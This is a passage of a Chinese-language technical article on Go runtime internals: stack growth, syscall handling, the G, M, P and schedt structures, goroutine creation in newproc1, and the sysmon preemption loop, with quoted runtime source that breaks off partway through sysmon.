  • 每次执行函数调用时 Go 的 runtime 都会进行检测,若当前栈的大小不够用,则会触发“中断”,从当前函数进入到 Go 的运行时库
  • 然后分配一个新的足够大的栈空间,接下来的处理有不同的策略

在 IDA 的伪代码中经常可以看到如下代码:

1
2
if ( (unsigned int)&retaddr <= *(_QWORD *)(v1 + 16LL) )
runtime_morestack_noctxt();
  • 函数 morestack_noctxt 用于扩展栈

在 go-1.3 版本之前,使用的栈结构是分段栈:

  • 随着 goroutine 调用的函数层级的深入或者局部变量需要的越来越多时,栈空间可能会出现不够用的情况
  • 在运行时会调用 runtime.morestack 和 runtime.newstack 创建一个新的栈空间,这些栈空间是不连续的,当前 goroutine 的多个栈空间会以双向链表的形式串联起来,运行时会通过指针找到各个栈片段
  • 当调用回溯的时候,不再使用的栈空间将会被系统回收

但分段栈有一个问题,如果当前 goroutine 的栈几乎充满,那么任意的函数调用都会触发栈的扩容,当函数返回后又会触发栈的收缩,如果在一个循环中调用函数,栈的分配和释放就会造成巨大的额外开销,这被称为热分裂问题

连续栈可以解决分段栈中存在的两个问题:

  • 其核心原理就是每当程序的栈空间不足时,初始化一片比旧栈大两倍的新栈并将原栈中的所有值都迁移到新的栈中,新的局部变量或者函数调用就有了充足的内存空间

使用连续栈机制时,栈空间不足导致的扩容会经历以下几个步骤:

  • 调用用 runtime.newstack 在内存空间中分配更大的栈内存空间
  • 使用 runtime.copystack 将旧栈中的所有内容复制到新的栈中
  • 将指向旧栈对应变量的指针重新指向新栈
  • 调用 runtime.stackfree 销毁并回收旧栈的内存空间

系统调用

go 的 syscall 库中提供了对系统调用的封装,它会在真正执行系统调用之前先调用函数 entersyscall,并在系统调用函数返回后调用 exitsyscall 函数

1
2
3
4
5
6
7
func syscall_syscall(fn, a1, a2, a3 uintptr) (r1, r2, err uintptr) {
args := struct{ fn, a1, a2, a3, r1, r2, err uintptr }{fn, a1, a2, a3, r1, r2, err}
entersyscall()
libcCall(unsafe.Pointer(abi.FuncPCABI0(syscall)), unsafe.Pointer(&args))
exitsyscall()
return args.r1, args.r2, args.err
}

这两个函数就是通知 go 的运行时库这个 goroutine 进入了系统调用或者完成了系统调用,调度器会做相应的调度

  • entersyscall:
    • 把当前 M 的 P 设置为 _Psyscall 状态,打上标识解绑 P -> M 的绑定,但 M 还保留 P 的指针
  • existsyscall:
    • 由于 M 到 P 的指向还在,那么优先还是用原来的 P,如果原来的 P 被处理掉了,那么就去用一个新的 P,如果还没有,那就只能把 G 挂到全局队列了
    • Go 的 sysmon(内部监控线程)发现有这种卡了超过 10 ms 的 M ,那么就会把 P 剥离出来,给到其他的 M 去处理执行,M 数量不够就会新创建

协程调度

go 的调度的实现,涉及到几个重要的数据结构,运行时库用这几个数据结构来实现 goroutine 的调度,管理 goroutine 和物理线程的运行,这些数据结构分别是结构体G,结构体M,结构体P,以及Sched结构体

结构体G

G 是 goroutine 的缩写,相当于操作系统中的进程控制块,在这里就是 goroutine 的控制结构,是对 goroutine 的抽象

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
type g struct {
stack stack // offset known to runtime/cgo
/* type stack struct {
lo uintptr // 该协程拥有的栈低位
hi uintptr // 该协程拥有的栈高位
} */
stackguard0 uintptr // 检查栈空间是否足够的值,低于这个值会扩张栈
stackguard1 uintptr // 检查栈空间是否足够的值,低于这个值会扩张栈

_panic *_panic // innermost panic - offset known to liblink
_defer *_defer // innermost defer
m *m // current m; offset known to arm liblink
sched gobuf // 用于记录协程切换的上下文
syscallsp uintptr // if status==Gsyscall, syscallsp = sched.sp to use during gc
syscallpc uintptr // if status==Gsyscall, syscallpc = sched.pc to use during gc
stktopsp uintptr // expected sp at top of stack, to check in traceback
// param is a generic pointer parameter field used to pass
// values in particular contexts where other storage for the
// parameter would be difficult to find. It is currently used
// in four ways:
// 1. When a channel operation wakes up a blocked goroutine, it sets param to
// point to the sudog of the completed blocking operation.
// 2. By gcAssistAlloc1 to signal back to its caller that the goroutine completed
// the GC cycle. It is unsafe to do so in any other way, because the goroutine's
// stack may have moved in the meantime.
// 3. By debugCallWrap to pass parameters to a new goroutine because allocating a
// closure in the runtime is forbidden.
// 4. When a panic is recovered and control returns to the respective frame,
// param may point to a savedOpenDeferState.
param unsafe.Pointer // 用于传递参数,睡眠时其它goroutine设置param,唤醒时此goroutine可以获取
atomicstatus atomic.Uint32
stackLock uint32 // sigprof/scang lock; TODO: fold in to atomicstatus
goid uint64 // goroutine的id号
schedlink guintptr
waitsince int64 // approx time when the g become blocked
waitreason waitReason // if status==Gwaiting

preempt bool // preemption signal, duplicates stackguard0 = stackpreempt
preemptStop bool // transition to _Gpreempted on preemption; otherwise, just deschedule
preemptShrink bool // shrink stack at synchronous safe point

// asyncSafePoint is set if g is stopped at an asynchronous
// safe point. This means there are frames on the stack
// without precise pointer information.
asyncSafePoint bool

paniconfault bool // panic (instead of crash) on unexpected fault address
gcscandone bool // g has scanned stack; protected by _Gscan bit in status
throwsplit bool // must not split stack
// activeStackChans indicates that there are unlocked channels
// pointing into this goroutine's stack. If true, stack
// copying needs to acquire channel locks to protect these
// areas of the stack.
activeStackChans bool
// parkingOnChan indicates that the goroutine is about to
// park on a chansend or chanrecv. Used to signal an unsafe point
// for stack shrinking.
parkingOnChan atomic.Bool
// inMarkAssist indicates whether the goroutine is in mark assist.
// Used by the execution tracer.
inMarkAssist bool
coroexit bool // argument to coroswitch_m

raceignore int8 // ignore race detection events
nocgocallback bool // whether disable callback from C
tracking bool // whether we're tracking this G for sched latency statistics
trackingSeq uint8 // used to decide whether to track this G
trackingStamp int64 // timestamp of when the G last started being tracked
runnableTime int64 // the amount of time spent runnable, cleared when running, only used when tracking
lockedm muintptr // G被锁定只能在这个M上运行
sig uint32
writebuf []byte
sigcode0 uintptr
sigcode1 uintptr
sigpc uintptr
parentGoid uint64 // 父类goroutine的goid
gopc uintptr // 创建这个goroutine的go表达式的pc
ancestors *[]ancestorInfo // ancestor information goroutine(s) that created this goroutine (only used if debug.tracebackancestors)
startpc uintptr // pc of goroutine function
racectx uintptr
waiting *sudog // sudog structures this g is waiting on (that have a valid elem ptr); in lock order
cgoCtxt []uintptr // cgo traceback context
labels unsafe.Pointer // profiler labels
timer *timer // cached timer for time.Sleep
sleepWhen int64 // when to sleep until
selectDone atomic.Uint32 // are we participating in a select and did someone win the race?

coroarg *coro // argument during coroutine transfers

// goroutineProfiled indicates the status of this goroutine's stack for the
// current in-progress goroutine profile
goroutineProfiled goroutineProfileStateHolder

// Per-G tracer state.
trace gTraceState

// Per-G GC state

// gcAssistBytes is this G's GC assist credit in terms of
// bytes allocated. If this is positive, then the G has credit
// to allocate gcAssistBytes bytes without assisting. If this
// is negative, then the G must correct this by performing
// scan work. We track this in bytes to make it fast to update
// and check for debt in the malloc hot path. The assist ratio
// determines how this corresponds to scan work debt.
gcAssistBytes int64
}
  • goroutine 切换时,上下文信息保存在结构体的 sched 域中,goroutine 切换时并不必陷入到操作系统内核中

结构体M

M 是 machine 的缩写,是对机器的抽象,每个 M 都是对应到一条操作系统的物理线程

  • M 必须关联了 P 才可以执行 go 代码
  • 当它处理阻塞或者系统调用时,可以不需要关联 P
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
type m struct {
g0 *g // 带有调度栈的goroutine
morebuf gobuf // gobuf arg to morestack
divmod uint32 // div/mod denominator for arm - known to liblink
_ uint32 // align next field to 8 bytes

// Fields not known to debuggers.
procid uint64 // for debuggers, but offset not hard-coded
gsignal *g // 关联P以执行Go代码
goSigStack gsignalStack // Go-allocated signal handling stack
sigmask sigset // storage for saved signal mask
tls [tlsSlots]uintptr // thread-local storage (for x86 extern register)
mstartfn func()
curg *g // M中当前运行的goroutine
caughtsig guintptr // goroutine running during fatal signal
p puintptr // attached p for executing go code (nil if not executing go code)
nextp puintptr
oldp puintptr // the p that was attached before executing a syscall
id int64
mallocing int32 // 状态
throwing throwType
preemptoff string // if != "", keep curg running on this m
locks int32
dying int32
profilehz int32
spinning bool // m is out of work and is actively looking for work
blocked bool // m is blocked on a note
newSigstack bool // minit on C thread called sigaltstack
printlock int8
incgo bool // m is executing a cgo call
isextra bool // m is an extra m
isExtraInC bool // m is an extra m that is not executing Go code
isExtraInSig bool // m is an extra m in a signal handler
freeWait atomic.Uint32 // Whether it is safe to free g0 and delete m (one of freeMRef, freeMStack, freeMWait)
needextram bool
traceback uint8
ncgocall uint64 // number of cgo calls in total
ncgo int32 // number of cgo calls currently in progress
cgoCallersUse atomic.Uint32 // if non-zero, cgoCallers in use temporarily
cgoCallers *cgoCallers // cgo traceback if crashing in cgo call
park note
alllink *m // 用于链接allm
schedlink muintptr
lockedg guintptr
createstack [32]uintptr // stack that created this thread, it's used for StackRecord.Stack0, so it must align with it.
lockedExt uint32 // tracking for external LockOSThread
lockedInt uint32 // tracking for internal lockOSThread
nextwaitm muintptr // next m waiting for lock

mLockProfile mLockProfile // fields relating to runtime.lock contention

// wait* are used to carry arguments from gopark into park_m, because
// there's no stack to put them on. That is their sole purpose.
waitunlockf func(*g, unsafe.Pointer) bool
waitlock unsafe.Pointer
waitTraceBlockReason traceBlockReason
waitTraceSkip int

syscalltick uint32
freelink *m // on sched.freem
trace mTraceState

// these are here because they are too large to be on the stack
// of low-level NOSPLIT functions.
libcall libcall
libcallpc uintptr // for cpu profiler
libcallsp uintptr
libcallg guintptr
syscall libcall // stores syscall parameters on windows

vdsoSP uintptr // SP for traceback while in VDSO call (0 if not in call)
vdsoPC uintptr // PC for traceback while in VDSO call

// preemptGen counts the number of completed preemption
// signals. This is used to detect when a preemption is
// requested, but fails.
preemptGen atomic.Uint32

// Whether this is a pending preemption signal on this M.
signalPending atomic.Uint32

// pcvalue lookup cache
pcvalueCache pcvalueCache

dlogPerM

mOS

chacha8 chacha8rand.State
cheaprand uint64

// Up to 10 locks held by this m, maintained by the lock ranking code.
locksHeldLen int
locksHeld [10]heldLockInfo
}
  • 普通的 goroutine 的栈是在堆上分配的可增长的栈,而 g0 的栈是 M 对应的线程的栈
  • 所有调度相关的代码,会先切换到该 goroutine 的栈中再执行

结构体P

P 是 Processor 逻辑处理器的缩写,每个 P 拥有一个本地队列并为 G 在 M 上的运行提供本地化资源

  • M 代表 OS 线程,P 代表 go 代码执行时需要的资源,当 M 执行 go 代码时,它需要关联一个 P
  • 所有的 P 被组织为一个数组,在 P 上实现了工作流窃取的调度器
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
type p struct {
id int32
status uint32 // one of pidle/prunning/...
link puintptr
schedtick uint32 // 每次调度时将它+1
syscalltick uint32 // incremented on every system call
sysmontick sysmontick // last tick observed by sysmon
m muintptr // back-link to associated m (nil if idle)
mcache *mcache // 系统线程缓存
pcache pageCache
raceprocctx uintptr

deferpool []*_defer // pool of available defer structs (see panic.go)
deferpoolbuf [32]*_defer

// Cache of goroutine ids, amortizes accesses to runtime·sched.goidgen.
goidcache uint64
goidcacheend uint64

// Queue of runnable goroutines. Accessed without lock.
runqhead uint32
runqtail uint32
runq [256]guintptr
// runnext, if non-nil, is a runnable G that was ready'd by
// the current G and should be run next instead of what's in
// runq if there's time remaining in the running G's time
// slice. It will inherit the time left in the current time
// slice. If a set of goroutines is locked in a
// communicate-and-wait pattern, this schedules that set as a
// unit and eliminates the (potentially large) scheduling
// latency that otherwise arises from adding the ready'd
// goroutines to the end of the run queue.
//
// Note that while other P's may atomically CAS this to zero,
// only the owner P can CAS it to a valid G.
runnext guintptr

// Available G's (status == Gdead)
gFree struct {
gList
n int32
}

sudogcache []*sudog
sudogbuf [128]*sudog

// Cache of mspan objects from the heap.
mspancache struct {
// We need an explicit length here because this field is used
// in allocation codepaths where write barriers are not allowed,
// and eliminating the write barrier/keeping it eliminated from
// slice updates is tricky, more so than just managing the length
// ourselves.
len int
buf [128]*mspan
}

// Cache of a single pinner object to reduce allocations from repeated
// pinner creation.
pinnerCache *pinner

trace pTraceState

palloc persistentAlloc // per-P to avoid mutex

// Per-P GC state
gcAssistTime int64 // Nanoseconds in assistAlloc
gcFractionalMarkTime int64 // Nanoseconds in fractional mark worker (atomic)

// limiterEvent tracks events for the GC CPU limiter.
limiterEvent limiterEvent

// gcMarkWorkerMode is the mode for the next mark worker to run in.
// That is, this is used to communicate with the worker goroutine
// selected for immediate execution by
// gcController.findRunnableGCWorker. When scheduling other goroutines,
// this field must be set to gcMarkWorkerNotWorker.
gcMarkWorkerMode gcMarkWorkerMode
// gcMarkWorkerStartTime is the nanotime() at which the most recent
// mark worker started.
gcMarkWorkerStartTime int64

// gcw is this P's GC work buffer cache. The work buffer is
// filled by write barriers, drained by mutator assists, and
// disposed on certain GC state transitions.
gcw gcWork

// wbBuf is this P's GC write barrier buffer.
//
// TODO: Consider caching this in the running G.
wbBuf wbBuf

runSafePointFn uint32 // if 1, run sched.safePointFn at next safe point

// statsSeq is a counter indicating whether this P is currently
// writing any stats. Its value is even when not, odd when it is.
statsSeq atomic.Uint32

// Timer heap.
timers timers

// maxStackScanDelta accumulates the amount of stack space held by
// live goroutines (i.e. those eligible for stack scanning).
// Flushed to gcController.maxStackScan once maxStackScanSlack
// or -maxStackScanSlack is reached.
maxStackScanDelta int64

// gc-time statistics about current goroutines
// Note that this differs from maxStackScan in that this
// accumulates the actual stack observed to be used at GC time (hi - sp),
// not an instantaneous measure of the total stack size that might need
// to be scanned (hi - lo).
scannedStackSize uint64 // stack size of goroutines scanned by this P
scannedStacks uint64 // number of goroutines scanned by this P

// preempt is set to indicate that this P should be enter the
// scheduler ASAP (regardless of what G is running on it).
preempt bool

// pageTraceBuf is a buffer for writing out page allocation/free/scavenge traces.
//
// Used only if GOEXPERIMENT=pagetrace.
pageTraceBuf pageTraceBuf

// Padding is no longer needed. False sharing is now not a worry because p is large enough
// that its size class is an integer multiple of the cache line size (for any of our architectures).
}
  • 在 P 中有一个 Grunnable 的 goroutine 队列,这是一个 P 的局部队列
  • 当 P 执行 go 代码时,它会优先从自己的这个局部队列中取,这时可以不用加锁,提高了并发度
  • 如果发现这个队列空了,则去其它 P 的队列中拿一半过来,这样实现工作流窃取的调度(这种情况下是需要给调用器加锁的)

结构体 Sched

Sched 是调度实现中使用的数据结构

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
type schedt struct {
goidgen atomic.Uint64
lastpoll atomic.Int64 // time of last network poll, 0 if currently polling
pollUntil atomic.Int64 // time to which current poll is sleeping

lock mutex

// When increasing nmidle, nmidlelocked, nmsys, or nmfreed, be
// sure to call checkdead().

midle muintptr // idle m's waiting for work
nmidle int32 // number of idle m's waiting for work
nmidlelocked int32 // number of locked m's waiting for work
mnext int64 // number of m's that have been created and next M ID
maxmcount int32 // maximum number of m's allowed (or die)
nmsys int32 // number of system m's not counted for deadlock
nmfreed int64 // cumulative number of freed m's

ngsys atomic.Int32 // number of system goroutines

pidle puintptr // idle p's
npidle atomic.Int32 // idle P的数量
nmspinning atomic.Int32 // See "Worker thread parking/unparking" comment in proc.go.
needspinning atomic.Uint32 // See "Delicate dance" comment in proc.go. Boolean. Must hold sched.lock to set to 1.

// Global runnable queue.
runq gQueue
runqsize int32

// disable controls selective disabling of the scheduler.
//
// Use schedEnableUser to control this.
//
// disable is protected by sched.lock.
disable struct {
// user disables scheduling of user goroutines.
user bool
runnable gQueue // pending runnable Gs
n int32 // length of runnable
}

// Global cache of dead G's.
gFree struct {
lock mutex
stack gList // Gs with stacks
noStack gList // Gs without stacks
n int32
}

// Central cache of sudog structs.
sudoglock mutex
sudogcache *sudog

// Central pool of available defer structs.
deferlock mutex
deferpool *_defer

// freem is the list of m's waiting to be freed when their
// m.exited is set. Linked through m.freelink.
freem *m

gcwaiting atomic.Bool // gc is waiting to run
stopwait int32
stopnote note
sysmonwait atomic.Bool
sysmonnote note

// safePointFn should be called on each P at the next GC
// safepoint if p.runSafePointFn is set.
safePointFn func(*p)
safePointWait int32
safePointNote note

profilehz int32 // cpu profiling rate

procresizetime int64 // nanotime() of last change to gomaxprocs
totaltime int64 // ∫gomaxprocs dt up to procresizetime

// sysmonlock protects sysmon's actions on the runtime.
//
// Acquire and hold this mutex to block sysmon from interacting
// with the rest of the runtime.
sysmonlock mutex

// timeToRun is a distribution of scheduling latencies, defined
// as the sum of time a G spends in the _Grunnable state before
// it transitions to _Grunning.
timeToRun timeHistogram

// idleTime is the total CPU time Ps have "spent" idle.
//
// Reset on each GC cycle.
idleTime atomic.Int64

// totalMutexWaitTime is the sum of time goroutines have spent in _Gwaiting
// with a waitreason of the form waitReasonSync{RW,}Mutex{R,}Lock.
totalMutexWaitTime atomic.Int64

// stwStoppingTimeGC/Other are distributions of stop-the-world stopping
// latencies, defined as the time taken by stopTheWorldWithSema to get
// all Ps to stop. stwStoppingTimeGC covers all GC-related STWs,
// stwStoppingTimeOther covers the others.
stwStoppingTimeGC timeHistogram
stwStoppingTimeOther timeHistogram

// stwTotalTimeGC/Other are distributions of stop-the-world total
// latencies, defined as the total time from stopTheWorldWithSema to
// startTheWorldWithSema. This is a superset of
// stwStoppingTimeGC/Other. stwTotalTimeGC covers all GC-related STWs,
// stwTotalTimeOther covers the others.
stwTotalTimeGC timeHistogram
stwTotalTimeOther timeHistogram

// totalRuntimeLockWaitTime (plus the value of lockWaitTime on each M in
// allm) is the sum of time goroutines have spent in _Grunnable and with an
// M, but waiting for locks within the runtime. This field stores the value
// for Ms that have exited.
totalRuntimeLockWaitTime atomic.Int64
}
  • 其中有 M 的 idle 队列,P 的 idle 队列,以及一个全局的就绪的 G 队列

G-P-M 模型

G-P-M 模型是基于线程池演化而来:

  • 把每个工作线程叫 worker 的话,每条线程运行一个 worker
  • 每个 worker 做的事情就是不停地从队列中取出任务并执行

在 G-P-M 模型中:

  • G 就是我们需要完成的任务
  • M 就是一个 worker(一条线程)
  • Sched 相当于管理可运行 G 的全局任务队列(当然也包括了其他的辅助信息)
  • P 则是在 go-1.1 中才引入的内容,为了解决 G 阻塞导致的 M 资源浪费问题

G-P-M 模型图解:

  • G:goroutine 协程
    • 通过 go 关键字创建,封装了所要执行的代码逻辑
    • 属于用户级资源,对 OS 透明,具备轻量级,可以大量创建,上下文切换成本地等特点
  • P:Processor 逻辑处理器
    • 默认 go 运行时的 Processor 数量等于 CPU 数量,也可以通过 GOMAXPROCS 函数指定 P 的数量
    • P 的主要作用是管理 G 运行,每个 P 拥有一个本地队列并为 G 在 M 上的运行提供本地化资源
  • M:Machine 操作系统创建的系统线程
    • 作用是执行 G 中包装的并行任务,被称为物理处理器
    • 其属于 OS 资源,可以创建的数量上也受限与 OS,通常情况下 G 的数量都多于活跃的 M
    • go 运行时调度器将 G 公平合理的安排到多个 M 上去执行
  • G和M的关系:
    • G是要执行的任务,M是具体执行G的工作线程,通过P建立G和M的联系从而执行
  • G和P的关系:
    • P是G的管理者,P将G交由M执行,并管理一定系统资源供G使用,一个P管理存储在其本地队列的所有G(P和G是1:n的关系)
  • P和M的关系:
    • P将管理的G交由M具体执行,当遇到阻塞时,P可以与M解绑,并找到空闲的M进行绑定继续执行队列中其他可执行的G(P和M是1:1的关系)

P 会从 Sched 中拿取 G 并加入自己的任务队列(在该任务队列中使用轻量级切换,不涉及内核),然后 P 将自己任务队列中的 G 交给 M 执行,一旦 G 阻塞,P 就会与 M 解除绑定,并寻找空闲的 M 继续执行任务队列中的 G,如果 P 中的任务队列全部执行完毕,则 P 会随机从其它 P 中窃取一半的可运行的 G

创建&销毁 goroutine

函数 runtime.newproc 会创建一个新的 G 结构体(核心工作由 runtime.newproc1 完成)

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
func newproc1(fn *funcval, callergp *g, callerpc uintptr, parked bool, waitreason waitReason) *g {
if fn == nil {
fatal("go of nil func value")
}

mp := acquirem() /* 获取当前的结构体M */
pp := mp.p.ptr() /* 获取当前结构体M的P队列 */
newg := gfget(pp) /* 查找是否有可用的结构体G */
if newg == nil {
newg = malg(stackMin) /* 创建一个拥有StackMin大小的栈的g */
casgstatus(newg, _Gidle, _Gdead) /* 将新创建的g从_Gidle更新为_Gdead状态 */
allgadd(newg) /* 将它挂到runtime的相关队列(allg)中 */
}
if newg.stack.hi == 0 {
throw("newproc1: newg missing stack")
}

if readgstatus(newg) != _Gdead {
throw("newproc1: new g is not Gdead")
}

totalSize := uintptr(4*goarch.PtrSize + sys.MinFrameSize) // extra space in case of reads slightly beyond frame
totalSize = alignUp(totalSize, sys.StackAlign)
sp := newg.stack.hi - totalSize
if usesLR {
// caller's LR
*(*uintptr)(unsafe.Pointer(sp)) = 0
prepGoExitFrame(sp)
}
if GOARCH == "arm64" {
// caller's FP
*(*uintptr)(unsafe.Pointer(sp - goarch.PtrSize)) = 0
}

memclrNoHeapPointers(unsafe.Pointer(&newg.sched), unsafe.Sizeof(newg.sched))
newg.sched.sp = sp /* 将sp,pc等上下文环境保存在g的sched域 */
newg.stktopsp = sp
newg.sched.pc = abi.FuncPCABI0(goexit) + sys.PCQuantum // +PCQuantum so that previous instruction is in same function
newg.sched.g = guintptr(unsafe.Pointer(newg))
gostartcallfn(&newg.sched, fn)
newg.parentGoid = callergp.goid
newg.gopc = callerpc
newg.ancestors = saveAncestors(callergp)
newg.startpc = fn.fn
if isSystemGoroutine(newg, false) {
sched.ngsys.Add(1)
} else {
// Only user goroutines inherit pprof labels.
if mp.curg != nil {
newg.labels = mp.curg.labels
}
if goroutineProfile.active {
// A concurrent goroutine profile is running. It should include
// exactly the set of goroutines that were alive when the goroutine
// profiler first stopped the world. That does not include newg, so
// mark it as not needing a profile before transitioning it from
// _Gdead.
newg.goroutineProfiled.Store(goroutineProfileSatisfied)
}
}
// Track initial transition?
newg.trackingSeq = uint8(cheaprand())
if newg.trackingSeq%gTrackingPeriod == 0 {
newg.tracking = true
}
gcController.addScannableStack(pp, int64(newg.stack.hi-newg.stack.lo)) /* 分配goroutine id */

// Get a goid and switch to runnable. Make all this atomic to the tracer.
trace := traceAcquire()
var status uint32 = _Grunnable
if parked {
status = _Gwaiting
newg.waitreason = waitreason
}
casgstatus(newg, _Gdead, status)

/* 将初始化完成的结构体G,挂到当前M的P的队列中 */
if pp.goidcache == pp.goidcacheend {
// Sched.goidgen is the last allocated id,
// this batch must be [sched.goidgen+1, sched.goidgen+GoidCacheBatch].
// At startup sched.goidgen=0, so main goroutine receives goid=1.
pp.goidcache = sched.goidgen.Add(_GoidCacheBatch)
pp.goidcache -= _GoidCacheBatch - 1
pp.goidcacheend = pp.goidcache + _GoidCacheBatch
}
newg.goid = pp.goidcache
pp.goidcache++
newg.trace.reset()
if trace.ok() {
trace.GoCreate(newg, newg.startpc, parked)
traceRelease(trace)
}

// Set up race context.
if raceenabled {
newg.racectx = racegostart(callerpc)
newg.raceignore = 0
if newg.labels != nil {
// See note in proflabel.go on labelSync's role in synchronizing
// with the reads in the signal handler.
racereleasemergeg(newg, unsafe.Pointer(&labelSync))
}
}
releasem(mp)

return newg
}

wakep 函数唤醒 P 时,调度器会试着寻找一个可用的 M 来绑定 P,必要的时候会新建 M,之后的调用链如下:

  • newproc -> newproc1 -> wakep(如果P数目没到上限) -> startm -> newm -> newosproc -> mstart(线程入口) -> schedule -> execute -> goroutine 协程运行
  • execute 会恢复 newproc1 中设置的上下文,这样就跳转到新的 goroutine 去执行了

当 fnstart 函数执行完返回时,它会返回到 runtime.exit 中,这时 runtime.exit 中会做一些回收工作,会将 G 的状态设置为 Gdead 等,并将 G 挂到 P 的 free 队列中

抢占式 goroutine

go 只是引入了一些很初级的抢占,并没有像操作系统调度那么复杂,没有对 goroutine 分时间片,设置优先级等,只有长时间阻塞于系统调用,或者运行了较长时间才会被抢占

runtime 开了一条后台线程,运行一个 sysmon 函数,这个函数会周期性地做 epoll 操作,同时它还会检测每个 P 是否运行了较长时间

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
func sysmon() {
lock(&sched.lock)
sched.nmsys++
checkdead()
unlock(&sched.lock)

lasttrace := int64(0)
idle := 0 // how many cycles in succession we had not wokeup somebody
delay := uint32(0)

for {
if idle == 0 { // start with 20us sleep...
delay = 20
} else if idle > 50 { // start doubling the sleep after 1ms...
delay *= 2
}
if delay > 10*1000 { // up to 10ms
delay = 10 * 1000
}
usleep(delay)

// sysmon should not enter deep sleep if schedtrace is enabled so that
// it can print that information at the right time.
//
// It should also not enter deep sleep if there are any active P's so
// that it can retake P's from syscalls, preempt long running G's, and
// poll the network if all P's are busy for long stretches.
//
// It should wakeup from deep sleep if any P's become active either due
// to exiting a syscall or waking up due to a timer expiring so that it
// can resume performing those duties. If it wakes from a syscall it
// resets idle and delay as a bet that since it had retaken a P from a
// syscall before, it may need to do it again shortly after the
// application starts work again. It does not reset idle when waking
// from a timer to avoid adding system load to applications that spend
// most of their time sleeping.
now := nanotime()
if debug.schedtrace <= 0 && (sched.gcwaiting.Load() || sched.npidle.Load() == gomaxprocs) {
lock(&sched.lock)
if sched.gcwaiting.Load() || sched.npidle.Load() == gomaxprocs {
syscallWake := false
next := timeSleepUntil()
if next > now {
sched.sysmonwait.Store(true)
unlock(&sched.lock)
// Make wake-up period small enough
// for the sampling to be correct.
sleep := forcegcperiod / 2
if next-now < sleep {
sleep = next - now
}
shouldRelax := sleep >= osRelaxMinNS
if shouldRelax {
osRelax(true)
}
syscallWake = notetsleep(&sched.sysmonnote, sleep)
if shouldRelax {
osRelax(false)
}
lock(&sched.lock)
sched.sysmonwait.Store(false)
noteclear(&sched.sysmonnote)
}
if syscallWake {
idle = 0
delay = 20
}
}
unlock(&sched.lock)
}

lock(&sched.sysmonlock)
// Update now in case we blocked on sysmonnote or spent a long time
// blocked on schedlock or sysmonlock above.
now = nanotime()

// trigger libc interceptors if needed
if *cgo_yield != nil {
asmcgocall(*cgo_yield, nil)
}
// poll network if not polled for more than 10ms
lastpoll := sched.lastpoll.Load()
if netpollinited() && lastpoll != 0 && lastpoll+10*1000*1000 < now {
sched.lastpoll.CompareAndSwap(lastpoll, now)
list, delta := netpoll(0) // non-blocking - returns list of goroutines
if !list.empty() {
// Need to decrement number of idle locked M's
// (pretending that one more is running) before injectglist.
// Otherwise it can lead to the following situation:
// injectglist grabs all P's but before it starts M's to run the P's,
// another M returns from syscall, finishes running its G,
// observes that there is no work to do and no other running M's
// and reports deadlock.
incidlelocked(-1)
injectglist(&list)
incidlelocked(1)
netpollAdjustWaiters(delta)
}
}
if GOOS == "netbsd" && needSysmonWorkaround {
// netpoll is responsible for waiting for timer
// expiration, so we typically don't have to worry
// about starting an M to service timers. (Note that
// sleep for timeSleepUntil above simply ensures sysmon
// starts running again when that timer expiration may
// cause Go code to run again).
//
// However, netbsd has a kernel bug that sometimes
// misses netpollBreak wake-ups, which can lead to
// unbounded delays servicing timers. If we detect this
// overrun, then startm to get something to handle the
// timer.
//
// See issue 42515 and
// https://gnats.netbsd.org/cgi-bin/query-pr-single.pl?number=50094.
if next := timeSleepUntil(); next < now {
startm(nil, false, false)
}
}
if scavenger.sysmonWake.Load() != 0 {
// Kick the scavenger awake if someone requested it.
scavenger.wake()
}
// retake P's blocked in syscalls
// and preempt long running G's
if retake(now) != 0 {
idle = 0
} else {
idle++
}
// check if we need to force a GC
if t := (gcTrigger{kind: gcTriggerTime, now: now}); t.test() && forcegc.idle.Load() {
lock(&forcegc.lock)
forcegc.idle.Store(false)
var list gList
list.push(forcegc.g)
injectglist(&list)
